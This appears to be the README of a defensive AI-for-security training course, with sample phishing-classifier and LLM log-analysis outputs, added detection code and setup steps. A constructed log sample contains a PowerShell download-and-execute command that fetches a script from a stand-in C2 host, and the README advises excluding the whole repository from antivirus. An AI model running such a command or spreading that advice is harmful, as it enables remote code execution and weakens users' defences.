A hands-on training program for security practitioners who want to build AI-powered tools for threat detection, incident response, and security automation. 50+ labs (including 9 intro labs and 12 bridge labs), 4 capstone projects, 18 CTF challenges. Includes sample datasets, solution walkthroughs, and Docker lab environment. Designed for vibe coding with AI assistants like Cursor, Claude Code, and Copilot.
Lab 10 - Phishing Classifier catches what rules miss:

```text
$ python labs/lab10-phishing-classifier/solution/main.py
[+] Training on 1,000 labeled emails...
[+] Model: Random Forest + TF-IDF (847 features)
[+] Accuracy: 96.2% | Precision: 94.1% | Recall: 97.8%

Scanning inbox (4 new emails)...

From: [email protected]
Subj: "Your account will be suspended in 24 hours"
--> PHISHING (98.2%) [urgency + spoofed domain]

From: [email protected]
Subj: "Q3 budget report attached"
--> LEGIT (94.6%)

From: [email protected]
Subj: "Click here to verify your identity"
--> PHISHING (96.7%) [link mismatch + typosquat]

From: [email protected]
Subj: "Password expires in 7 days - reset here"
--> SUSPICIOUS (67.3%) [needs review]

Top features that caught phishing:
  urgency_words: +0.34 (suspend, verify, immediately)
  url_mismatch:  +0.28 (display != actual link)
  domain_spoof:  +0.22 (amaz0n, paypa1)
```
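As an added example (not code from the lab or the repository), the three signals named in the output above implemented with the standard library only; the brand list, the urgency word list, and the sample email are assumptions constructed for the demo:

```python
"""The three hand-crafted signals the Lab 10 output reports (urgency words, display/actual
link mismatch, digit-substitution domain spoofing), as an added standard-library example.
The brand list, urgency words and sample email are constructed assumptions, not lab data."""
import re
from urllib.parse import urlparse

URGENCY_WORDS = {"suspend", "suspended", "verify", "immediately", "urgent", "expires"}
BRANDS = {"amazon", "paypal", "microsoft"}            # assumed brand list for typosquat checks
LEET = str.maketrans("013457", "oleast")              # undo 0->o 1->l 3->e 4->a 5->s 7->t
ANCHOR = re.compile(r'<a\s[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)
HOST_IN_TEXT = re.compile(r"(?:https?://)?([\w-]+(?:\.[\w-]+)+)")

def second_level(host):
    """'login.amaz0n-secure.com' -> 'amaz0n-secure' (crude; no public-suffix list)."""
    parts = host.lower().split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]

def url_mismatch(html):
    """Link text names one host but the href goes elsewhere ('display != actual link')."""
    for href, text in ANCHOR.findall(html):
        shown = HOST_IN_TEXT.search(re.sub(r"<[^>]+>", "", text))
        actual = urlparse(href).hostname
        if shown and actual and shown.group(1).lower() != actual.lower():
            return True
    return False

def domain_spoof(sender):
    """Sender domain is not a brand but becomes one once digit substitution is undone."""
    base = second_level(sender.rsplit("@", 1)[-1]).split("-")[0]   # 'amaz0n-secure' -> 'amaz0n'
    return base not in BRANDS and base.translate(LEET) in BRANDS

def urgency_words(subject, html):
    """Number of distinct urgency terms in the subject plus the tag-stripped body."""
    text = (subject + " " + re.sub(r"<[^>]+>", " ", html)).lower()
    return len(set(re.findall(r"[a-z]+", text)) & URGENCY_WORDS)

def extract_features(sender, subject, html):
    """Feature dict in the shape the Lab 10 output names; feed it to any classifier."""
    return {"urgency_words": urgency_words(subject, html),
            "url_mismatch": url_mismatch(html),
            "domain_spoof": domain_spoof(sender)}

# Constructed email modelled on the first inbox entry in the sample output.
SAMPLE = extract_features(
    "security@amaz0n-secure.com",
    "Your account will be suspended in 24 hours",
    'Please <a href="http://login.example.net/verify">verify at www.amazon.com</a> immediately.')
```

These booleans and counts are the kind of columns that sit next to the TF-IDF vector when the Random Forest is trained; the typosquat check is deliberately narrow (digit substitution only) so that brand names with real digits are not flagged.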
Lab 35 - LLM Log Analysis finds attacks in noise:

```text
+------------------------------------------------------+
| Lab 35: LLM-Powered Security Log Analysis - SOLUTION |
+------------------------------------------------------+

Security Log Analysis Pipeline

Step 1: Initializing LLM...
LLM initialized: READY

Step 2: Parsing log entries...
Parsing entry 1/5... Done
Parsing entry 2/5... Done
Parsing entry 3/5... Done
Parsing entry 4/5... Done
Parsing entry 5/5... Done
Parsed 5 log entries

Step 3: Analyzing for threats...
Found 2 threats
Severity: 8/10

Step 4: Extracting IOCs...
Extracted 12 IOCs

Step 5: Generating incident report...
Report generated

================================================================
INCIDENT REPORT
================================================================

+--------------------------------------------------------------+
| Executive Summary                                            |
+--------------------------------------------------------------+
A critical security incident involving multi-stage attack behavior
was detected on WORKSTATION01 involving user 'jsmith'. The attack
progression includes initial PowerShell execution downloading a
payload from a suspicious external domain, followed by system
discovery commands, and culminating in persistence establishment
via Registry Run keys and Scheduled Tasks.

+--------------------------------------------------------------+
| Timeline                                                     |
+--------------------------------------------------------------+
1  2025-01-15 03:22:10 - PowerShell downloaded payload from
                         hxxp://evil-c2[.]com/payload.ps1
2  2025-01-15 03:22:15 - Discovery commands executed
                         (whoami, hostname, ipconfig)
3  2025-01-15 03:22:18 - Network connection to evil-c2[.]com
                         (185[.]143[.]223[.]47:443)
4  2025-01-15 03:23:00 - Registry persistence: HKCU Run keys
5  2025-01-15 03:25:00 - Scheduled Task: SecurityUpdate created

+--------------------------------------------------------------+
| MITRE ATT&CK Mapping                                         |
+--------------------------------------------------------------+
Technique ID   Technique Name                 Evidence
-------------------------------------------------------------
T1059.001      PowerShell                     DownloadString, IEX
T1082          System Information Discovery   whoami, hostname
T1547.001      Registry Run Keys              HKCU\...\Run
T1053.005      Scheduled Task                 SecurityUpdate
T1105          Ingress Tool Transfer          DownloadString

+--------------------------------------------------------------+
| Attribution Analysis                                         |
+--------------------------------------------------------------+
High Confidence: FIN7/Carbanak
  * Tooling matches known campaigns (PowerShell obfuscation)
  * Infrastructure historically associated with FIN7
  * TTP sequence is signature behavior pattern
```
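As an added example that is not the lab's own code, here is the core of steps 2 to 4 above (parse entries, tag ATT&CK techniques, extract and defang IOCs) done deterministically with regex evidence patterns rather than an LLM; the log lines, the technique-to-pattern table and the `timestamp message` layout are constructed assumptions:

```python
"""IOC extraction and ATT&CK tagging over log lines like those behind the Lab 35
report. Added example (standard library only): the log lines, technique table and
defang format are constructed here and are not the lab's own code or data."""
import re

URL_RE = re.compile(r"https?://[\w.-]+(?::\d+)?(?:/[^\s'\"]*)?", re.I)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}(?::\d{1,5})?\b")
# Assumed evidence patterns, one per technique the report maps (regex, case-insensitive).
TECHNIQUES = [
    ("T1059.001", r"\b(?:IEX|Invoke-Expression)\b"),      # PowerShell
    ("T1105",     r"\bDownloadString\b"),                  # Ingress Tool Transfer
    ("T1082",     r"\b(?:whoami|hostname|ipconfig)\b"),    # System Information Discovery
    ("T1547.001", r"CurrentVersion\\Run\b"),               # Registry Run Keys
    ("T1053.005", r"\bschtasks\b.*?/create"),              # Scheduled Task
]

def defang(ioc):
    """Report style: http -> hxxp and '.' -> '[.]' in the host part only."""
    scheme, host, rest = re.match(r"(https?://)?([^/]+)(.*)", ioc, re.I).groups()
    return re.sub("(?i)http", "hxxp", scheme or "") + host.replace(".", "[.]") + rest

def extract_iocs(line):
    """Sorted, de-duplicated, defanged URLs and IPv4 addresses found in one line."""
    return sorted(defang(i) for i in set(URL_RE.findall(line)) | set(IPV4_RE.findall(line)))

def map_techniques(line):
    """Technique IDs whose evidence pattern appears in the line, in table order."""
    return [tid for tid, pat in TECHNIQUES if re.search(pat, line, re.I)]

def analyze(lines):
    """Steps 2-4 of the pipeline: parse each entry, tag techniques, collect IOCs."""
    timeline, iocs = [], set()
    for line in lines:
        ts, _, msg = line.partition(" ")          # assumed 'timestamp message' layout
        techs, found = map_techniques(msg), extract_iocs(msg)
        iocs.update(found)
        if techs or found:                        # keep only entries with evidence
            timeline.append({"ts": ts, "techniques": techs, "iocs": found})
    return {"timeline": timeline, "iocs": sorted(iocs)}

# Constructed log lines modelled on the report's timeline; not real telemetry.
SAMPLE_LOGS = [
    "2025-01-15T03:22:10 WORKSTATION01 jsmith powershell.exe -nop -c "
    "\"IEX (New-Object Net.WebClient).DownloadString('http://evil-c2.com/payload.ps1')\"",
    "2025-01-15T03:22:15 WORKSTATION01 jsmith cmd.exe /c whoami && hostname && ipconfig",
    "2025-01-15T03:22:18 WORKSTATION01 netconn dst=185.143.223.47:443 sni=evil-c2.com",
    "2025-01-15T03:23:00 WORKSTATION01 reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater",
    "2025-01-15T03:25:00 WORKSTATION01 schtasks /create /tn SecurityUpdate /sc minute",
    "2025-01-15T03:26:00 WORKSTATION01 jsmith notepad.exe",
]
```

Running `analyze(SAMPLE_LOGS)` drops the benign `notepad.exe` entry and keeps the five evidenced ones in order, which is the structure the LLM step in the lab is then asked to narrate; the defanged IOC list is what goes into the report so that copied indicators are not clickable.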
No installation needed -- click and run in your browser:

- Beginner (No API key)
- Intermediate (No API key)
- Advanced (API key required)

All 50+ notebooks are in `notebooks/` -- open any `.ipynb` in Colab.
| Your Background | Start Here | Next Steps |
|---|---|---|
| Completely new to AI? | Lab 02: Prompt Engineering | -> Lab 07 -> Lab 10 |
| New to AI/ML? | Lab 10: Phishing Classifier | -> Lab 11 -> Lab 12 |
| Know Python, want LLM tools? | Lab 15: LLM Log Analysis | -> Lab 16 -> Lab 18 |
| Want DFIR focus? | Lab 31: Ransomware Detection | -> Lab 33 -> Lab 34 |
Tip: Labs 00-13 are FREE (no API keys). LLM labs (14+) need an API key (~$5-25 total).
Click any lab to explore -- Your learning journey from setup to expert:
Legend: Grey Foundation (00-09, Free) | Green ML Foundations (10-13, Free) | Purple LLM Basics (14-18) | Orange Detection/DFIR (19-29) | Red Advanced/Cloud (30-50)
Detailed Lab Descriptions
| Lab | Topic | Description |
|---|---|---|
| 00 | Setup | Environment configuration |
| 01 | Python | Security-focused Python basics |
| 02 | Prompts | LLM basics with free playgrounds |
| 03 | Vibe Coding | AI assistants for accelerated learning |
| 04 | ML Intro | Supervised/unsupervised, features, evaluation |
| 05 | AI in SOC | Where AI fits, human-in-the-loop |
| 06 | Stats | Matplotlib, Seaborn for dashboards |
| 07 | Hello ML | Your first ML model end-to-end |
| 08 | APIs | REST APIs, authentication, rate limiting |
| 09 | CTF Fundamentals | CTF mindset, encoding, flag hunting |
| Lab | Topic | Description |
|---|---|---|
| 10 | Phishing | TF-IDF, Random Forest, classification |
| 11 | Malware | K-Means, DBSCAN, clustering binaries |
| 12 | Anomaly | Isolation Forest, LOF, baselines |
| 13 | ML vs LLM | When to use each, cost tradeoffs |
| Lab | Topic | Description |
|---|---|---|
| 14 | Agent | ReAct pattern, tool calling basics |
| 15 | Logs | Prompt engineering, IOC extraction |
| 16 | Intel | LangChain, autonomous investigation |
| 17 | Vectors | Embeddings, similarity search |
| 18 | RAG | ChromaDB, retrieval-augmented Q&A |
| Lab | Topic | Description |
|---|---|---|
| 19 | Binary | PE structure, entropy analysis |
| 20 | Sigma | Log-based detection rules |
| 21 | YARA | AI-assisted rule generation |
| 22 | Vuln | CVSS, risk prioritization |
| 23 | Pipeline | ML filtering + LLM enrichment |
| 24 | Monitor | Observability, cost tracking |
| 25 | DFIR | Forensics basics, evidence collection |
| 26 | Windows Logs | Event log parsing, detection |
| 27 | Registry | Registry forensics, persistence |
| 28 | Live IR | Live response, triage procedures |
| 29 | IR Bot | Conversational IR, playbook execution |
| 30 | Ransom Fund | Ransomware families, attack lifecycle |
| 31 | Ransom | Entropy, behavioral detection |
| 32 | Purple | Safe adversary emulation |
| 33 | Memory | Volatility3, process injection |
| 34 | C2 | Beaconing, DNS tunneling, JA3 |
| 35 | Lateral | Auth anomalies, graph paths |
| Lab | Topic | Description |
|---|---|---|
| 36 | Actors | TTP extraction, attribution |
| 37 | AI Threat | Deepfakes, AI-generated phishing |
| 38 | MLSec | Data poisoning, model security |
| 39 | Adv ML | Evasion attacks, robust defenses |
| 40 | LLM Security | Prompt injection testing, jailbreaks |
| 41 | Model Monitor | Drift detection, adversarial inputs |
| 42 | Tuning | LoRA, custom embeddings |
| 43 | RAG Security | KB poisoning, context sanitization |
| 44 | Cloud Fund | Shared responsibility, IAM |
| 45 | Cloud | AWS/Azure/GCP, CloudTrail |
| 46 | Container | Kubernetes, runtime detection |
| 47 | Serverless | Lambda, event injection |
| 48 | Cloud IR | Automated containment, evidence |
| 49 | Red Team | Prompt injection, jailbreaks |
| 50 | Purple AI | Automated attack simulation |
| Project | Difficulty | Focus |
|---|---|---|
| Security Analyst Copilot | Advanced | LLM agents, IR automation |
| Automated Threat Hunter | Advanced | ML detection, pipelines |
| Malware Analysis Assistant | Intermediate | Static analysis, YARA |
| Vulnerability Intel Platform | Intermediate | RAG, prioritization |
Each includes starter code, requirements, and evaluation criteria. See capstone-projects/.
| Requirement | Minimum | Recommended |
|---|---|---|
| Python | 3.10 | 3.10-3.12 (PyTorch not yet available for 3.13+) |
| RAM | 8GB | 16GB (for local LLMs) |
| OS | Windows, macOS, Linux | Any |
| Editor | Any | VS Code, Cursor, PyCharm |
| Git | Required | - |
| Docker | Optional | For containerized labs |
| API Key | Labs 14+ only | Free tiers available |
```bash
git clone https://github.com/depalmar/ai_for_the_win.git
cd ai_for_the_win/docker

# Start Jupyter only (fastest — enough for most labs)
docker compose up -d jupyter

# Or start everything (requires 8GB+ RAM)
docker compose up -d

# Access Jupyter Lab: http://localhost:8888 (token: aiforthewin)
```

Available services: Jupyter Lab, Elasticsearch, Kibana, PostgreSQL, Redis, MinIO, Ollama (local LLMs), ChromaDB (vectors). Start only what you need — see `docker/README.md` for service profiles.
Python 3.10, 3.11, or 3.12 required. Python 3.13 is experimental. Python 3.14 is not supported — it causes `resolution-too-deep` errors because PyTorch, LangChain, and other packages lack 3.14 wheels. Check with `python --version` before proceeding.

```bash
# 1. Clone the repository
git clone https://github.com/depalmar/ai_for_the_win.git
cd ai_for_the_win

# 2. Create virtual environment (use python3.12 if you have multiple versions)
python -m venv venv
source venv/bin/activate        # Windows: .\venv\Scripts\activate

# 3. Install dependencies (pick ONE)
pip install -r requirements.txt   # Everything (all providers)
pip install -e ".[anthropic]"     # Core + Claude (recommended)
pip install -e ".[ollama]"        # Core + Ollama (free, local)
pip install -e "."                # Core only (Labs 00-13, no LLM)

# 4. Verify setup
python scripts/verify_setup.py

# 5. Start with Lab 00 (no API key needed)
cd labs/lab00-environment-setup
```

Dependency install failing?

If `pip install` hangs or fails with `resolution-too-deep`:

- Check Python version — must be 3.10-3.12 (`python --version`)
- Try `uv` (faster resolver): `pip install uv && uv pip install -r requirements.txt`
- Install selectively: `pip install -e ".[anthropic]"` instead of the full `requirements.txt`

See Troubleshooting Guide for details.
```bash
# Copy example env
cp .env.example .env

# Edit .env with your preferred editor and add API key
# IMPORTANT: Don't paste keys in terminal (saved in history)
# Example: ANTHROPIC_API_KEY=your-key-here

# Verify setup
python scripts/verify_setup.py
```

| Variable | Description | Required |
|---|---|---|
| ANTHROPIC_API_KEY | Claude API | One LLM key required |
| OPENAI_API_KEY | GPT-4/5 API | One LLM key required |
| GOOGLE_API_KEY | Gemini API | One LLM key required |
| VIRUSTOTAL_API_KEY | VirusTotal | Optional |
You only need ONE LLM provider. All labs support multiple providers.
```bash
pytest tests/ -v                  # All tests
pytest tests/test_lab01*.py -v    # Single lab
pytest tests/ --cov=labs          # With coverage
docker compose run test           # In Docker
```

| Resource | Description |
|---|---|
| Environment Setup | First-time setup |
| API Keys Guide | Get API keys, manage costs |
| Troubleshooting | Fix common issues |
| Lab Walkthroughs | Step-by-step solutions |
| Role-Based Paths | SOC, IR, hunting paths |
| Security-to-AI Glossary | AI terms for security folks |
| All Guides | 28 guides: tools, APIs, advanced |
Issues? Open a GitHub issue
| Category | Tools |
|---|---|
| LLM Providers | Claude (Sonnet/Opus/Haiku), GPT-5, Gemini 3, Ollama |
| LLM Frameworks | LangChain, LangGraph, LiteLLM |
| ML/AI | scikit-learn, PyTorch, Transformers |
| Vector DB | ChromaDB, sentence-transformers |
| Security | YARA, Sigma, MITRE ATT&CK, pefile |
| Vibe Coding | Cursor, Claude Code, Copilot, Windsurf |
Created by Raymond DePalma
Contributions welcome! Please read CONTRIBUTING.md first.
AI for the Win is dual-licensed for maximum flexibility:
| Content Type | License | Personal Use | Commercial Use |
|---|---|---|---|
| Educational content, labs, docs | CC BY-NC-SA 4.0 | ✅ FREE | Requires license |
| Code samples and scripts | MIT | ✅ FREE | ✅ FREE |
- Individual learning and skill development
- Academic coursework (as a student)
- Personal portfolio projects
- Contributing back to this project
Need a license for:
- Corporate training programs (internal employee training)
- Bootcamps & courses (paid training programs)
- Consulting engagements using materials
- Universities (formal curricula - FREE with attribution)
View Commercial Licensing Options | Contact Raymond DePalma
"AI for the Win" is a trademark of Raymond DePalma. You may reference this project by name with attribution, but may not use it in competing training programs or in ways that suggest official affiliation.
See LICENSE for complete terms.
Some labs and CTF challenges include sample malware metadata, IOC patterns, or simulated attack artifacts that may trigger antivirus software. These files contain analysis data for educational purposes, not actual malware.
Paths to exclude in your antivirus software:
- `ai_for_the_win/` - The entire repository (recommended)
- `ctf-challenges/**/challenge/` - CTF challenge files with simulated web shells, persistence mechanisms
- `labs/lab21-yara-generator/data/` - Malware metadata for YARA rule generation
- `data/malware/` - Sample malware analysis artifacts
Add folder exclusions for these paths in your AV settings if files are being quarantined.
This project aims to be accessible to all learners:
- Lab difficulty indicators use both color AND text labels (e.g., "Beginner")
- All code examples include descriptive comments
- Documentation uses high-contrast text
If you encounter accessibility issues, please open an issue.
Responsible Use: This material is for defensive security education only. Do not use techniques described here for unauthorized access or attacks. See RESPONSIBLE_USE.md.
This is a personal educational project created and maintained on personal time. It is not affiliated with, endorsed by, or sponsored by any employer, organization, or vendor.
Ready to build AI-powered security tools?
Start in Colab | Local Setup | Full Curriculum
